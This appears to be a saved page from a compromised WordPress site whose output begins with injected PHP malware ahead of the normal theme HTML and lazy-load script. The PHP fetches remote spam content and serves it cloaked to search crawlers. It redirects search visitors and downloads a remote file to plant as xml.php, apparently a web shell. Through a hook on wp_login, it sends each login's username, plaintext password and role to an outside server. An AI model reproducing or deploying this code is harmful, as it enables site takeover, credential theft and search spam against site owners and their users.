if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <!--[if IE 9 ]> <html lang="en" class="ie9 loading-site no-js"> <![endif]--> <!--[if IE 8 ]> <html lang="en" class="ie8 loading-site no-js"> <![endif]--> <!--[if (gte IE 9)|!(IE)]><!--><html lang="en" class="loading-site no-js"> <!--<![endif]--> <head><meta charset="UTF-8" /><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>class RocketLazyLoadScripts{constructor(){this.triggerEvents=["keydown","mousedown","mousemove","touchmove","touchstart","touchend","wheel"],this.userEventHandler=this._triggerListener.bind(this),this.touchStartHandler=this._onTouchStart.bind(this),this.touchMoveHandler=this._onTouchMove.bind(this),this.touchEndHandler=this._onTouchEnd.bind(this),this.clickHandler=this._onClick.bind(this),this.interceptedClicks=[],window.addEventListener("pageshow",(e=>{this.persisted=e.persisted})),window.addEventListener("DOMContentLoaded",(()=>{this._preconnect3rdParties()})),this.delayedScripts={normal:[],async:[],defer:[]},this.allJQueries=[]}_addUserInteractionListener(e){document.hidden?e._triggerListener():(this.triggerEvents.forEach((t=>window.addEventListener(t,e.userEventHandler,{passive:!0}))),window.addEventListener("touchstart",e.touchStartHandler,{passive:!0}),window.addEventListener("mousedown",e.touchStartHandler),document.addEventListener("visibilitychange",e.userEventHandler))}_removeUserInteractionListener(){this.triggerEvents.forEach((e=>window.removeEventListener(e,this.userEventHandler,{passive:!0}))),document.removeEventListener("visibilitychange",this.userEventHandler)}_onTouchStart(e){"HTML"!==e.target.tagName&&(window.addEventListener("touchend",this.touchEndHandler),window.addEventListener("mouseup",this.touchEndHandler),window.addEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.addEventListener("mousemove",this.touchMoveHandler),e.target.addEventListener("click",this.clickHandler),this._renameDOMAttribute(e.target,"onclick","rocket-onclick"))}_onTouchMove(e){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler),e.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(e.target,"rocket-onclick","onclick")}_onTouchEnd(e){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler)}_onClick(e){e.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(e.target,"rocket-onclick","onclick"),this.interceptedClicks.push(e),e.preventDefault(),e.stopPropagation(),e.stopImmediatePropagation()}_replayClicks(){window.removeEventListener("touchstart",this.touchStartHandler,{passive:!0}),window.removeEventListener("mousedown",this.touchStartHandler),this.interceptedClicks.forEach((e=>{e.target.dispatchEvent(new MouseEvent("click",{view:e.view,bubbles:!0,cancelable:!0}))}))}_renameDOMAttribute(e,t,n){e.hasAttribute&&e.hasAttribute(t)&&(event.target.setAttribute(n,event.target.getAttribute(t)),event.target.removeAttribute(t))}_triggerListener(){this._removeUserInteractionListener(this),"loading"===document.readyState?document.addEventListener("DOMContentLoaded",this._loadEverythingNow.bind(this)):this._loadEverythingNow()}_preconnect3rdParties(){let e=[];document.querySelectorAll("script[type=rocketlazyloadscript]").forEach((t=>{if(t.hasAttribute("src")){const n=new URL(t.src).origin;n!==location.origin&&e.push({src:n,crossOrigin:t.crossOrigin||"module"===t.getAttribute("data-rocket-type")})}})),e=[...new Map(e.map((e=>[JSON.stringify(e),e]))).values()],this._batchInjectResourceHints(e,"preconnect")}async _loadEverythingNow(){this.lastBreath=Date.now(),this._delayEventListeners(),this._delayJQueryReady(this),this._handleDocumentWrite(),this._registerAllDelayedScripts(),this._preloadAllScripts(),await this._loadScriptsFromList(this.delayedScripts.normal),await this._loadScriptsFromList(this.delayedScripts.defer),await this._loadScriptsFromList(this.delayedScripts.async);try{await this._triggerDOMContentLoaded(),await this._triggerWindowLoad()}catch(e){}window.dispatchEvent(new Event("rocket-allScriptsLoaded")),this._replayClicks()}_registerAllDelayedScripts(){document.querySelectorAll("script[type=rocketlazyloadscript]").forEach((e=>{e.hasAttribute("src")?e.hasAttribute("async")&&!1!==e.async?this.delayedScripts.async.push(e):e.hasAttribute("defer")&&!1!==e.defer||"module"===e.getAttribute("data-rocket-type")?this.delayedScripts.defer.push(e):this.delayedScripts.normal.push(e):this.delayedScripts.normal.push(e)}))}async _transformScript(e){return await this._littleBreath(),new Promise((t=>{const n=document.createElement("script");[...e.attributes].forEach((e=>{let t=e.nodeName;"type"!==t&&("data-rocket-type"===t&&(t="type"),n.setAttribute(t,e.nodeValue))})),e.hasAttribute("src")?(n.addEventListener("load",t),n.addEventListener("error",t)):(n.text=e.text,t());try{e.parentNode.replaceChild(n,e)}catch(e){t()}}))}async _loadScriptsFromList(e){const t=e.shift();return t?(await this._transformScript(t),this._loadScriptsFromList(e)):Promise.resolve()}_preloadAllScripts(){this._batchInjectResourceHints([...this.delayedScripts.normal,...this.delayedScripts.defer,...this.delayedScripts.async],"preload")}_batchInjectResourceHints(e,t){var n=document.createDocumentFragment();e.forEach((e=>{if(e.src){const i=document.createElement("link");i.href=e.src,i.rel=t,"preconnect"!==t&&(i.as="script"),e.getAttribute&&"module"===e.getAttribute("data-rocket-type")&&(i.crossOrigin=!0),e.crossOrigin&&(i.crossOrigin=e.crossOrigin),n.appendChild(i)}})),document.head.appendChild(n)}_delayEventListeners(){let e={};function t(t,n){!function(t){function n(n){return e[t].eventsToRewrite.indexOf(n)>=0?"rocket-"+n:n}e[t]||(e[t]={originalFunctions:{add:t.addEventListener,remove:t.removeEventListener},eventsToRewrite:[]},t.addEventListener=function(){arguments[0]=n(arguments[0]),e[t].originalFunctions.add.apply(t,arguments)},t.removeEventListener=function(){arguments[0]=n(arguments[0]),e[t].originalFunctions.remove.apply(t,arguments)})}(t),e[t].eventsToRewrite.push(n)}function n(e,t){let n=e[t];Object.defineProperty(e,t,{get:()=>n||function(){},set(i){e["rocket"+t]=n=i}})}t(document,"DOMContentLoaded"),t(window,"DOMContentLoaded"),t(window,"load"),t(window,"pageshow"),t(document,"readystatechange"),n(document,"onreadystatechange"),n(window,"onload"),n(window,"onpageshow")}_delayJQueryReady(e){let t=window.jQuery;Object.defineProperty(window,"jQuery",{get:()=>t,set(n){if(n&&n.fn&&!e.allJQueries.includes(n)){n.fn.ready=n.fn.init.prototype.ready=function(t){e.domReadyFired?t.bind(document)(n):document.addEventListener("rocket-DOMContentLoaded",(()=>t.bind(document)(n)))};const t=n.fn.on;n.fn.on=n.fn.init.prototype.on=function(){if(this[0]===window){function e(e){return e.split(" ").map((e=>"load"===e||0===e.indexOf("load.")?"rocket-jquery-load":e)).join(" ")}"string"==typeof arguments[0]||arguments[0]instanceof String?arguments[0]=e(arguments[0]):"object"==typeof arguments[0]&&Object.keys(arguments[0]).forEach((t=>{delete Object.assign(arguments[0],{[e(t)]:arguments[0][t]})[t]}))}return t.apply(this,arguments),this},e.allJQueries.push(n)}t=n}})}async _triggerDOMContentLoaded(){this.domReadyFired=!0,await this._littleBreath(),document.dispatchEvent(new Event("rocket-DOMContentLoaded")),await this._littleBreath(),window.dispatchEvent(new Event("rocket-DOMContentLoaded")),await this._littleBreath(),document.dispatchEvent(new Event("rocket-readystatechange")),await this._littleBreath(),document.rocketonreadystatechange&&document.rocketonreadystatechange()}async _triggerWindowLoad(){await this._littleBreath(),window.dispatchEvent(new Event("rocket-load")),await this._littleBreath(),window.rocketonload&&window.rocketonload(),await this._littleBreath(),this.allJQueries.forEach((e=>e(window).trigger("rocket-jquery-load"))),await this._littleBreath();const e=new Event("rocket-pageshow");e.persisted=this.persisted,window.dispatchEvent(e),await this._littleBreath(),window.rocketonpageshow&&window.rocketonpageshow({persisted:this.persisted})}_handleDocumentWrite(){const e=new Map;document.write=document.writeln=function(t){const n=document.currentScript,i=document.createRange(),r=n.parentElement;let o=e.get(n);void 0===o&&(o=n.nextSibling,e.set(n,o));const s=document.createDocumentFragment();i.setStart(s,0),s.appendChild(i.createContextualFragment(t)),r.insertBefore(s,o)}}async _littleBreath(){Date.now()-this.lastBreath>45&&(await this._requestAnimFrame(),this.lastBreath=Date.now())}async _requestAnimFrame(){return document.hidden?new Promise((e=>setTimeout(e))):new Promise((e=>requestAnimationFrame(e)))}static run(){const e=new RocketLazyLoadScripts;e._addUserInteractionListener(e)}}RocketLazyLoadScripts.run();</script> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://sonnhagiaphat.com/xmlrpc.php" /> <script type="rocketlazyloadscript">(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script> <style> .pro-wccp:before { content: "\f160"; top: 3px; } .pro-wccp:before{ color:#02CA03 !important } .pro-wccp { transform: rotate(45deg); } </style> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, 